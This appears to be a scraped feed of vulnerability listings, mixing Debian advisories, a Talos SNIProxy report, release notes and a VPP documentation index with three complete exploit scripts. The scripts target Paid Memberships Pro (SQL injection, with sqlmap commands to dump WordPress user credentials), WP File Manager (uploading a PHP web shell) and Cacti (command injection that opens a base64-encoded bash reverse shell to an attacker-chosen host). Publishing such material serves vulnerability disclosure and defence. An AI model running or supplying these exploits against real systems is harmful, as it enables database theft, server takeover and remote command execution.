WordPress Paid Memberships Pro plugin version 2.9.8 suffers from a remote SQL injection vulnerability.

    #!/usr/bin/env python# Exploit Title: Paid Memberships Pro  v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection# Exploit Author: r3nt0n# CVE: CVE-2023-23488# Date: 2023/01/24# Vulnerability discovered by Joshua Martinelle# Vendor Homepage: https://www.paidmembershipspro.com# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip# Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9# Version: < 2.9.8# Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7## Running this script against a WordPress instance with Paid Membership Pro plugin# tells you if the target is vulnerable.# As the SQL injection technique required to exploit it is Time-based blind, instead of# trying to directly exploit the vuln, it will generate the appropriate sqlmap command# to dump the whole database (probably very time-consuming) or specific chose data like# usernames and passwords.## Usage example: python3 CVE-2023-23488.py http://127.0.0.1/wordpressimport sysimport requestsdef get_request(target_url, delay="1"):    payload = "a' OR (SELECT 1 FROM (SELECT(SLEEP(" + delay + ")))a)-- -"    data = {'rest_route': '/pmpro/v1/order',            'code': payload}    return requests.get(target_url, params=data).elapsed.total_seconds()print('Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n')if len(sys.argv) != 2:    print('Usage: {} <target_url>'.format("python3 CVE-2023-23488.py"))    print('Example: {} http://127.0.0.1/wordpress'.format("python3 CVE-2023-23488.py"))    sys.exit(1)target_url = sys.argv[1]try:    print('[-] Testing if the target is vulnerable...')    req = requests.get(target_url, timeout=15)except:    print('{}[!] ERROR: Target is unreachable{}'.format(u'\033[91m',u'\033[0m'))    sys.exit(2)if get_request(target_url, "1") >= get_request(target_url, "2"):    print('{}[!] The target does not seem vulnerable{}'.format(u'\033[91m',u'\033[0m'))    sys.exit(3)print('\n{}[*] The target is vulnerable{}'.format(u'\033[92m', u'\033[0m'))print('\n[+] You can dump the whole WordPress database with:')print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump'.format(target_url))print('\n[+] To dump data from specific tables:')print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users'.format(target_url))print('\n[+] To dump only WordPress usernames and passwords columns (you should check if users table have the default name):')print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass'.format(target_url))sys.exit(0)

WordPress Paid Memberships Pro 2.9.8 SQL Injection

WordPress File Manager plugin versions 6.0 through 6.9 suffer from a remote shell upload vulnerability.

    #!/usr/bin/env# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE# Date: [ 22-01-2023 ]# Exploit Author: [BLY]# Vendor Homepage: [https://wpscan.com/vulnerability/10389]# Version: [ File Manager plugin 6.0-6.9]# Tested on: [ Debian ]# CVE : [ CVE-2020-25213 ]import sys,signal,time,requestsfrom bs4 import BeautifulSoup#from pprint import pprintdef handler(sig,frame):  print ("[!]Saliendo")  sys.exit(1)signal.signal(signal.SIGINT,handler)def commandexec(command):  exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"  params = {    "cmd":command  }  r=requests.get(exec_url,params=params)  soup = BeautifulSoup(r.text, 'html.parser')  text = soup.get_text()  print (text)def exploit():  global url  url = sys.argv[1]  command = sys.argv[2]  upload_url = url+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"  headers = {      'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",      'Connection': "close"   }  payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"  try:    r=requests.post(upload_url,data=payload,headers=headers)    #pprint(r.json())    commandexec(command)  except:    print("[!] Algo ha salido mal...")def help():  print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")  print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")if __name__ == '__main__':  if len(sys.argv) != 3:    help()  else:    exploit()

WordPress File Manager 6.9 Shell Upload

mod_auth_openidc is an authentication and authorization module for the Apache 2.x HTTP server that implements the OpenID Connect Relying Party functionality. In versions 2.0.0 through 2.4.13.1, when `OIDCStripCookies` is set and a crafted cookie supplied, a NULL pointer dereference would occur, resulting in a segmentation fault. This could be used in a Denial-of-Service attack and thus presents an availability risk. Version 2.4.13.2 contains a patch for this issue. As a workaround, avoid using `OIDCStripCookies`.

1.  Releases
2.  v2.4.13.2

**Security**

*   CVE-2023-28625: prevent core dump when OIDCStripCookies is set and a crafted Cookie header is supplied  
    GHSA-f5xw-rvfr-24qr
*   fix code scanning alerts from 2 code scanning tools all over the place

**Features**

*   add support for Elliptic Curve signing/encryption keys in addtiion to RSA keys,  
    i.e. client keys configured in OIDCPrivateKeyFiles/OIDCPublicKeyFiles, published on OIDCClientJwksUri  
    and used in private_key_jwt authentication, encrypted id_token's, request objects/uri's,  
    but also statically configured provider keys in OIDCOAuthVerifyCertFiles and OIDCProviderVerifyCertFiles
*   record authorization errors in environment variable OIDC_AUTHZ_ERROR  
    so its value can be used in logs e.g. with HTTP 401 responses in the access log:  
        LogFormat "%h %l %u %t %U %401{OIDC_AUTHZ_ERROR}e %>s %b" combined  
    also log authorization errors with oidc_debug instead of oidc_info

**Bugfixes**

*   fix for omitting the kid# prefix in OIDCPublicKeyFiles/OIDCPrivateKeyFiles and other certificate configuration primitives when linked against OpenSSL <= 1.0.x
*   allow target_link_uri's without a path in 3rd-party-init SSO with a multi-provider setup
*   correct cookie path printout in error log when target_link_uri does not match OIDCCookiePath

**Commercial**

*   binary packages for various other platforms such as Microsoft Windows 64bit/32bit, Red Hat Enterprise Linux 6, Red Hat Enterprise Linux 7/8 on Power PC (ppc64, ppc64le), Oracle Linux 6/7, older Ubuntu and Debian distro's, Oracle HTTP Server 11.1/12.1/12.2, IBM HTTP Server 8/9, Solaris 11.4, IBM AIX 7.2 and Mac OS X are available under a commercial agreement via sales@openidc.com
*   support for Redis over TLS, Redis (TLS) Sentinel, and Redis (TLS) Cluster is available under a commercial license via sales@openidc.com

CVE-2023-28625: Release release 2.4.13.2 · OpenIDC/mod_auth_openidc

Cacti version 1.2.22 suffers from a remote command execution vulnerability.

    # Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)# Exploit Author: Riadh BOUCHAHOUA# Discovery Date: 2022-12-08 # Vendor Homepage: https://www.cacti.net/# Software Links : https://github.com/Cacti/cacti# Tested Version: 1.2.2x <= 1.2.22# CVE: CVE-2022-46169# Tested on OS: Debian 10/11#!/usr/bin/env python3import randomimport httpx, urllibclass Exploit:    def __init__(self, url, proxy=None, rs_host="",rs_port=""):        self.url = url         self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()},verify=False,proxies=proxy)        self.rs_host = rs_host        self.rs_port = rs_port    def exploit(self):        # cacti local ip from the url for the X-Forwarded-For header        local_cacti_ip  = self.url.split("//")[1].split("/")[0]            headers = {            'X-Forwarded-For': f'{local_cacti_ip}'        }                revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'"        import base64        b64_revshell = base64.b64encode(revshell.encode()).decode()        payload = f";echo {b64_revshell} | base64 -d | bash -"        payload = urllib.parse.quote(payload)        urls = []                # Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell)        for host_id in range(1,100):            for local_data_ids in range(1,100):                urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}")                        for url in urls:            r = self.session.get(url,headers=headers)            print(f"{r.status_code} - {r.text}" )        pass    def random_user_agent(self):        ua_list = [            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",            "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",        ]        return random.choice(ua_list)def parse_args():    import argparse        argparser = argparse.ArgumentParser()    argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)")    argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True)    argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True)    return argparser.parse_args()def main() -> None:    # Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL     args = parse_args()    e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)    e.exploit()if __name__ == "__main__":    main()

Cacti 1.2.22 Remote Command Execution

A ReDoS issue was discovered in the Time component through 0.2.1 in Ruby through 3.2.1. The Time parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to Time objects. The fixed versions are 0.1.1 and 0.2.2.

CVE-2023-28756: Ruby 3.2.0 Released

Debian Linux Security Advisory 5380-1 - Jan-Niklas Sohn discovered that a user-after-free flaw in the Composite extension of the X.org X server may result in privilege escalation if the X server is running under the root user.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5380-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
March 29, 2023                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : xorg-server  
CVE ID         : CVE-2023-1393

Jan-Niklas Sohn discovered that a user-after-free flaw in the Composite  
extension of the X.org X server may result in privilege escalation if  
the X server is running under the root user.

For the stable distribution (bullseye), this problem has been fixed in  
version 2:1.20.11-1+deb11u6.

We recommend that you upgrade your xorg-server packages.

For the detailed security status of xorg-server please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/xorg-server

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmQkNc1fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0TcaA/+MDyL5ZfwUH63eGRjsDgYlfwiTKPEOG6XLjT5dmTX8nBJtt+SSP8TA2u7  
Tm76IUS6chdLDTkhoEo0iEfaFMOWyCWcDcWJY9BEGxIlOu84Hbx+zzwx1sFFHytL  
NKRLTWHiMknT9j4mBnmgqUeXSWtyhzHBHniRpHgTFvnVMOdLCyZSg9EjWAldxVhK  
KluolmLF6j+KCG14OWx62lUrX5hFOW9fUPVs2FHVD02qp8/MjyLLJAGVA0GVDqC/  
uXs46KWrpudUjqh4uOERY0Pa9zQ/CCZnp/VElr8kdOVWsChvs2sC63/6H/2dHyUV  
TPI5dEO/IDa96SKxNLQl0pHIhzPUAntJPVfu40edhXiLBrkag13y+e/ipvjk1OTD  
h2W0cq8GQ2Y+mNNme0CmS8xVO9V4XT1ScA1HpeDEPooOxFsepCSdWsEHDLUQOjkW  
uUMVRGpeE+RM4DX4roU/dfn029kzZWTx7/50XW2++8iQvLJY9G79pkMUyh/QLhQ1  
XgNTU684YbUQTgeLuMJXlB9hU0YWeO20/Yq9pFAzIhT2IRELcdF7cQm2Yvfy7eHc  
bs3OwdyqVrZkzBwFYj6bFm2iSQVgAl3lyv4QwZel82dMEZusD2bggrwsWB8tjsY5  
T8GL0HjdNpLSHQb2AwlmsdmteXkvQLiZarw74dQBLTvjpVGjP4s=  
=FUIu  
-----END PGP SIGNATURE-----

Debian Security Advisory 5380-1

A buffer overflow vulnerability exists in the handling of wildcard backend hosts of SNIProxy 0.6.0-2 and the master branch (commit: 822bb80df9b7b345cc9eba55df74a07b498819ba). A specially crafted HTTP, TLS or DTLS packet can lead to arbitrary code execution. An attacker could send a malicious packet to trigger this vulnerability.

**SUMMARY**

A buffer overflow vulnerability exists in the handling of wildcard backend hosts of SNIProxy 0.6.0-2 and the master branch (commit: 822bb80df9b7b345cc9eba55df74a07b498819ba). A specially crafted HTTP, TLS or DTLS packet can lead to arbitrary code execution. An attacker could send a malicious packet to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

SNIProxy 0.6.0-2  
SNIProxy Master 822bb80df9b7b345cc9eba55df74a07b498819ba

**PRODUCT URLS**

SNIProxy - https://github.com/dlundquist/sniproxy

**CVSSv3 SCORE**

9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**DETAILS**

SNIProxy (https://github.com/dlundquist/sniproxy) is an open source application that reverse proxies HTTP and TLS connections based on the requested hostname. It is distributed via package manager on several Linux distributions.

When wildcard backend hosts are used in SNIProxy configuration, an attacker could achieve remote code execution or denial of service by sending a crafted HTTP, TLS or DTLS packet.

The latest version on GitHub and the 0.6.0-2 Debian package were determined to be vulnerable. Note that while the original repository hasn’t been updated in several years, there are several forks of the original repository which are more active and may also contain this bug.

SNIProxy contains functions to parse addresses and hostnames, usually obtained by parsing the HTTP Host header or from a TLS server name indication (SNI) extension header. The new\_address() function parses arbitrary hostname or address strings into a usable format. This function is called when parsing the configuration file, and, more importantly, when parsing hostnames that are to be sent to a wildcard backend.

Example wildcard configuration (note the asterisk on the right side):

    table my_hosts {
        [a-z0-9]*\\.example\\.com *:443
    }
    

Normally, TLS libraries such as OpenSSL do not allow SNI hostname values to exceed 256 bytes. However, SNIProxy does not use an external library for this functionality. It implements its own basic parsing on the TLS header values, which allow longer values to be parsed. The same also applies to the HTTP “Host” header, which itself has no maximum length in an HTTP request. As such, SNIProxy will extract and accept hostnames of arbitrary lengths.

During code inspection, an issue was observed in the new_address() function in the code block that parses IPv6 address strings (e.g. “\[ff02::1\]”). The issue arises because the source length is used in a string copy rather than destination length when copying into a stack buffer of size 262. The source length is calculated based on the distance between the opening and closing square brackets, which can be more than 262 due to the behavior noted above with unrestricted hostname lengths. Because of this, the call to strncpy will overflow the ip_buf buffer, resulting in a stack buffer overflow.

    char ip_buf[262];
    ... snip ...
    /* [IPv6 address] */
    memset(&s, 0, sizeof(s));
    if (hostname_or_ip[0] == '[' &&
            (port = strchr(hostname_or_ip, ']')) != NULL) {
        len = (size_t)(port - hostname_or_ip - 1); // len can be longer than 262
        ...
        strncpy(ip_buf, hostname_or_ip + 1, len); // buffer overflow here
        ip_buf[len] = '\0';
    

**Exploit Proof of Concept**

Configure an SNIProxy instance with the following configuration:

    listen 0.0.0.0 443 {
        proto tls 
        table my_hosts
    }
    
    table my_hosts {
        .*test\\.example\\.com *:443
    }
    

Attached is a proof-of-concept that will either crash SNIProxy outright, or, in the case of missing compiler mitigations, may redirect SNIProxy’s execution flow to a specified memory address (in this case, the invalid address 0xdeadbeefdeadbeef).

**Mitigation**

This is a suggested patch for the affected code in the new_address() function in address.c, which prevents the string copy from overflowing the destination and ensures that the resultant buffer is null terminated: 
        strncpy(ip_buf, hostname_or_ip + 1, sizeof(ip_buf));
        ip_buf[sizeof(ip_buf) - 1] = '\0';

**TIMELINE**

2023-03-16 - Initial Vendor Contact  
2023-03-17 - Vendor Disclosure  
2023-03-17 - Vendor Patch Release  
2023-03-30 - Public Release

Discovered by Keane O'Kelley of Cisco ASIG.

CVE-2023-25076: TALOS-2023-1731 || Cisco Talos Intelligence Group

FP.io VPP (Vector Packet Processor) 22.10, 22.06, 22.02, 21.10, 21.06, 21.01, 20.09, 20.05, 20.01, 19.08, and 19.04 Generates a Predictable IV with CBC Mode.

The Vector Packet Processor

FD.io’s Vector Packet Processor (VPP) is a fast, scalable layer 2-4 multi-platform network stack. It runs in Linux Userspace on multiple architectures including x86, ARM, and Power architectures.

VPP’s high performance network stack is quickly becoming the network stack of choice for applications around the world.

VPP is continually being enhanced through the extensive use of plugins. The Data Plane Development Kit (DPDK) is a great example of this. It provides some important features and drivers for VPP.

VPP supports integration with OpenStack and Kubernetes. Network management features include configuration, counters, sampling and more. For developers, VPP includes high-performance event-logging, and multiple kinds of packet tracing. Development debug images include complete symbol tables, and extensive consistency checking.

Some VPP Use-cases include vSwitches, vRouters, Gateways, Firewalls and Load-Balancers, to name a few.

For more details click on the links below or press next.

About VPP

*   Scalar vs Vector packet processing
*   The Packet Processing Graph
*   Network Stack Features
*   Host Stack
*   Additional features
*   Supported archs and OS
*   Performance
*   Release notes
*   VPP Supported Features

Use Cases

*   VPP with Containers
*   VPP with Iperf3 and TRex
*   VPP in the Cloud
*   VPP with Virtual Machines
*   VPP with VMware/Vmxnet3
*   VPP as a Home Gateway
*   Access Control Lists with VPP
*   Generating traffic with VPP
*   Web applications with VPP
*   Simulating networks with VPP
*   Stateless Traffic Gen with VPP
*   IKEv2 with VPP
*   VPP in kubernetes (Contiv/Deprecated)
*   VPP Container Test Bench

Getting started

*   Downloading and Installing VPP
    *   Installing on Ubuntu / Debian OS Distros
    *   Package Descriptions
*   Running VPP
    *   Usergroup
    *   Systemd File vpp.service
    *   Huge Pages
*   Progressive VPP Tutorial
    *   Setting up your environment
    *   Running VPP
    *   Creating an Interface
    *   Using the trace command
    *   Connecting Two FD.io VPP Instances
    *   Routing
    *   Switching
*   Troubleshooting
    *   CPU Load/Usage
    *   Google Sanitizers
    *   Memory leaks

Developer Documentation

*   Build, Run & Debug
    *   Building VPP
    *   Running VPP
    *   Testing VPP
    *   GDB Examples
    *   Cross compilation on MacOS
*   Core Architecture
    *   Software Architecture
    *   VPPINFRA (Infrastructure)
    *   VLIB (Vector Processing Library)
    *   VNET (VPP Network Stack)
    *   Feature Arcs
    *   Buffer Metadata
    *   Multi-architecture support
    *   Bounded-index Extensible Hashing (bihash)
    *   Build System
    *   VPP mem preload
    *   Multi-threading in VPP
*   Core Features
    *   The FIB
    *   Segment routing
    *   Punting Packets
    *   IPSec (IP Security)
    *   BFD module
    *   IP Reassembly
    *   IPFIX support
    *   Switched Port Analyzer
    *   MTU in VPP
    *   Generic Segmentation Offload
    *   Syslog protocol support
    *   Event-logger
    *   Statistics
    *   SELinux - VPP Custom SELinux Policy
    *   Policing
*   Adding a new plugin or feature
    *   Adding a plugin
    *   Sample plugin for VPP
    *   Handoff queue in a plugin
*   Plugins
    *   QUIC HostStack
    *   Cloud NAT
    *   Linux Control Plane Integration
    *   SRv6 Plugins
    *   Marvell device plugin
    *   LLDP Protocol
    *   Stateful NAT64
    *   Active-Passive NAT HA
    *   NAT44-ED: NAT44 Endpoint Dependent
    *   PNAT 1:1 match & rewrite NAT
    *   Load Balancer plugin
    *   LACP Protocol
    *   IPFIX flow record plugin
    *   MAP and Lw4o6
    *   Buffer metadata change tracker
    *   DHCPv6 prefix delegation
    *   Inband OAM (iOAM)
    *   Wireguard vpp-plugin
    *   SRTP Protocol
    *   Multicore support for ACL plugin
    *   ACL plugin constant-time lookup
    *   ACL Lookup contexts
    *   Buffers monitoring plugin
*   Device drivers
    *   Intel AVF device driver
    *   RDMA (ibverb) device driver
    *   VMWARE vmxnet3 device driver
    *   AF\_XDP device driver
*   VPP Test Framework
    *   Overview
    *   Anatomy of a test case
    *   Logging
    *   Parallel test execution
    *   Test temporary directory and VPP life cycle
    *   Virtual environment
    *   Naming conventions
    *   Automatically generated addresses
    *   Packet flow in the VPP Test Framework
    *   Test framework objects
    *   How VPP APIs/CLIs are called
    *   Utility methods
    *   Example: how to add a new test
*   VPP extra tools
    *   Code coverage with lcov
    *   VPP Snap Build
    *   Strongswan Testing Tool
    *   VPP configuration utility
    *   VPP interface stats client
    *   VPP stats segment FUSE filesystem
    *   VPP Top Installation
    *   LD\_PRELOAD the VCL
    *   Host stack test framework

Interfacing with VPP

*   The binary API
    *   VPP API module
    *   VPP API Language
    *   Writing API handlers
*   C api client
*   C++ api client
*   Go api (govpp)
    *   Components involved
    *   Getting started
    *   Launch VPP
    *   Connecting to VPP
*   Rust api client
*   Memif library (libmemif)
    *   Shared Memory Packet Interface (memif) Library
    *   Build Instructions
    *   Getting started
    *   Libmemif Examples

Contributing

*   Getting a Patch Reviewed
    *   Setup
    *   Clone with ssh
    *   Git Review
*   Writing VPP Documentation
    *   Building the docs
    *   View the results
    *   Writing Docs and merging
*   Reporting Bugs
    *   Data to include in bug reports
    *   Capturing post-mortem data
    *   Core files from Private Images

Debug CLI

*   Getting Started with the debug CLI
    *   Debug and Telnet CLI
    *   CLI features
*   Interface Commands
    *   Basic Interface Commands
    *   Hardware-Interfaces Commands
    *   Create Interfaces Commands
    *   Set Interface Commands
*   Reference
    *   ARP and Loopback CLI
    *   Circular Journal
    *   Command line session
    *   DPDK Crypto
    *   DPDK and pcap tx
    *   Host Interface
    *   Image Version Information
    *   Init functions
    *   Interface
    *   Layer 2 CLI
    *   Layer 3 IP CLI
    *   Network Delay Simulator
    *   Static HTTP Server
    *   Unix Interface
    *   VLIB application library
    *   VXLAN CLI
    *   VXLAN-GBP CLI
    *   Perfmon cli reference
    *   Gbp cli reference
    *   L2e cli reference
    *   netmap
    *   Abf cli reference
    *   Acl cli reference
    *   Adl cli reference
    *   Af\_xdp cli reference
    *   Arping cli reference
    *   Avf cli reference
    *   Bufmon cli reference
    *   Builtinurl cli reference
    *   Cdp cli reference
    *   Cnat cli reference
    *   Crypto\_sw\_scheduler cli reference
    *   Ct6 cli reference
    *   Dhcp cli reference
    *   Dispatch-trace cli reference
    *   Dns cli reference
    *   Cryptodev cli reference
    *   Flowprobe cli reference
    *   Geneve cli reference
    *   Gtpu cli reference
    *   Hs\_apps cli reference
    *   Igmp cli reference
    *   Ikev2 cli reference
    *   Ila cli reference
    *   Ip6 cli reference
    *   Encap cli reference
    *   Export cli reference
    *   Export-vxlan-gpe cli reference
    *   Ip6 cli reference
    *   Lib-pot cli reference
    *   Lib-trace cli reference
    *   Lib-vxlan-gpe cli reference
    *   Udp-ping cli reference
    *   L2tp cli reference
    *   L3xc cli reference
    *   Lacp cli reference
    *   Lb cli reference
    *   Linux-cp cli reference
    *   Test cli reference
    *   Lisp-cp cli reference
    *   Lisp-gpe cli reference
    *   Test cli reference
    *   Lldp cli reference
    *   Mactime cli reference
    *   Map cli reference
    *   Pp2 cli reference
    *   Mdata cli reference
    *   Memif cli reference
    *   Mss\_clamp cli reference
    *   Det44 cli reference
    *   Dslite cli reference
    *   Nat44-ed cli reference
    *   Nat44-ei cli reference
    *   Nat64 cli reference
    *   Nat66 cli reference
    *   Pnat cli reference
    *   Nsh cli reference
    *   Nsh-md2-ioam cli reference
    *   Export-nsh-md2-ioam cli reference
    *   Oddbuf cli reference
    *   Perfmon cli reference
    *   Ping cli reference
    *   Pppoe cli reference
    *   Prom cli reference
    *   Quic cli reference
    *   Rdma cli reference
    *   Snort cli reference
    *   Stn cli reference
    *   Svs cli reference
    *   Tlsopenssl cli reference
    *   Tracedump cli reference
    *   Unittest cli reference
    *   Urpf cli reference
    *   Vhost cli reference
    *   Vmxnet3 cli reference
    *   Vrrp cli reference
    *   Wireguard cli reference
    *   Dma cli reference
    *   Pci cli reference
    *   Stats cli reference
    *   Vlibapi cli reference
    *   Vlibmemory cli reference
    *   Adj cli reference
    *   Arp cli reference
    *   Bfd cli reference
    *   Bier cli reference
    *   Bonding cli reference
    *   Classify cli reference
    *   Crypto cli reference
    *   Pipe cli reference
    *   Tap cli reference
    *   Dpo cli reference
    *   Feature cli reference
    *   Fib cli reference
    *   Flow cli reference
    *   Gre cli reference
    *   Gso cli reference
    *   Hash cli reference
    *   Interface cli reference
    *   Ip-neighbor cli reference
    *   Reass cli reference
    *   Ip6-nd cli reference
    *   Ipfix-export cli reference
    *   Ipip cli reference
    *   Ipsec cli reference
    *   Lawful-intercept cli reference
    *   Mfib cli reference
    *   Mpls cli reference
    *   Pg cli reference
    *   Policer cli reference
    *   Qos cli reference
    *   Session cli reference
    *   Span cli reference
    *   Srmpls cli reference
    *   Srv6 cli reference
    *   Syslog cli reference
    *   Tcp cli reference
    *   Teib cli reference
    *   Udp cli reference
    *   Unix cli reference
    *   Vxlan-gpe cli reference
    *   Api cli reference
    *   App cli reference
    *   Vnet cli reference
    *   vHost User

Configuration file

*   Getting started with the configuration
    *   Command-line Arguments
    *   Configuration File (startup.conf)
*   Configuration Reference
    *   The unix section
    *   The api-trace Section
    *   The api-segment Section
    *   The socksvr Section
    *   The cpu Section
    *   The buffers Section
    *   The dpdk Section
    *   The plugins Section
    *   Some Advanced Parameters:
    *   acl-plugin Section
    *   api-queue Section
    *   cj Section
    *   dns Section
    *   ethernet Section
    *   heapsize Section
    *   ip Section
    *   ip6 Section
    *   l2learn Section
    *   l2tp Section
    *   logging Section
    *   mactime Section
    *   “map” Parameters
    *   nat Section
    *   oam Section
    *   physmem Section
    *   tapcli Section
    *   tcp Section
    *   tls Section
    *   tuntap Section
    *   vhost-user Section
    *   vlib Section

About this documentation

VPP Version : 23.02\-release
Built on    : 02 March 2023

CVE-2022-46397: What is the Vector Packet Processor (VPP) — The Vector Packet Processor v23.02-0-g5516fc0f3 documentation

Debian Linux Security Advisory 5379-1 - Kim Alvefur discovered that insufficient message sender validation in dino-im, a modern XMPP/Jabber client, may result in manipulation of entries in the personal bookmark store without user interaction via a specially crafted message. Additionally an attacker can take advantage of this flaw to change how group chats are displayed or force a user to join or leave an attacker-selected groupchat.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5379-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoMarch 27, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : dino-imCVE ID         : CVE-2023-28686Debian Bug     : 1033370Kim Alvefur discovered that insufficient message sender validation indino-im, a modern XMPP/Jabber client, may result in manipulation ofentries in the personal bookmark store without user interaction via aspecially crafted message. Additionally an attacker can take advantageof this flaw to change how group chats are displayed or force a user tojoin or leave an attacker-selected groupchat.For the stable distribution (bullseye), this problem has been fixed inversion 0.2.0-3+deb11u1.We recommend that you upgrade your dino-im packages.For the detailed security status of dino-im please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/dino-imFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmQh9+5fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0RbDw//Z/7169K4r3YYBJIYG6AoQIhkxoTOYoXn9HFy4a9itr7WJGG4tbEXeL8544J+We3WWc4PdoxTPkh3Sb2lX38Fn/6yD5n1Ciszq5zj0k2nMXhylA5Hi46yR0YWwLmIZTcUxNLKum+PqfrCVAzYPmELz1KZ17moO0xkOQXm82mOedGQbsa2Sh1Soh8FVCR/uR8b68bMLopbmEAISgG0aRVWqJFBI700jO67t9dxww50fAVir1m+IIXc0N3r4JSQtm7twwI5JqZgMsW4zUMw2SN31UshuUMKZWt+PF1wXeMWZXrjLtLIlVLWxaDRcLx2azTyazloROjL8X9D0FbLQQhJ3IwiTyzxexLZ9tcWSOslA52bc3NFyyy9IvUowXV4B6ImmVOsuQ47VQzLJ0qOyzYSwfyvx96U5RSOsci73YVbnh2cENQWx6gGfDk6j61ttQeEmAN+qsjocXBpokrq8BOJzTEE/5uzBQO9tykL5O5CtmpV63GjBHyE7kXbqdFZEs+uJDqB4LiVMWoWKXEXYZlEfNigLABH/YriXn2xwRMbCMr8PnCSNpJFcYGjgIUHQcbCwe78ulU3hM1hvtH3rlsw6zV/JpFRYAIhl0A4kzYszEpWH5ZZTF1lW+g9N0pt8ZnwG9HF3rIVij/7ywCQDaqlzkoJUTmrDKcEGcXmvZ8H05E==jDD6-----END PGP SIGNATURE-----

Debian Security Advisory 5379-1

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

**ReQlogic 11.3 Cross Site Scripting**

Posted Mar 28, 2023

Authored by Okan Kurtulus

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

advisories | CVE-2022-41441

SHA-256 | 5227ba88f59a5d4cccd1b7cd664927cd29c2794c9b0bb18836fe0f6ab3662551

Download | Favorite | View

**ReQlogic 11.3 Cross Site Scripting**

